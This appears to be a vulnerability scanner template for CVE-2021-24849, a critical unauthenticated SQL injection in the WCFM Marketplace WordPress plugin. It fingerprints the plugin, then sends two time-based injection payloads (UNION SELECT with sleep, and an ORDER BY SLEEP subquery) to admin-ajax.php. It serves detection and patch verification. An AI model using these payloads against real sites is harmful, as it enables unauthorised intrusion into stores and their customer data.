2024-02-13 04:02:40 +00:00
id: CVE-2021-24849
info:
  name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
  remediation: Fixed in 3.4.12
  reference:
    - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24849
    - https://wordpress.org/plugins/wc-multivendor-marketplace/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24849
    cwe-id: CWE-89
    epss-score: 0.02367
    epss-percentile: 0.89609
    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wclovers
    product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
  tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
flow: http(1) && http(2)
http:
  - raw:
      - |
        GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
        condition: and
        internal: true
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{post_data}}
    payloads:
      post_data:
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains(body, "success")'
        condition: and
# digest: 4b0a00483046022100ade9023a98f1e582ced87da228df4387a9351ee1bc7d0f80b959b1c01efe9301022100a724a4b3f7b0d2716fa368d0014ba7c027ba80d657109e06ec9571050764a3e9:922c64590222798bb761d5b6d8e72950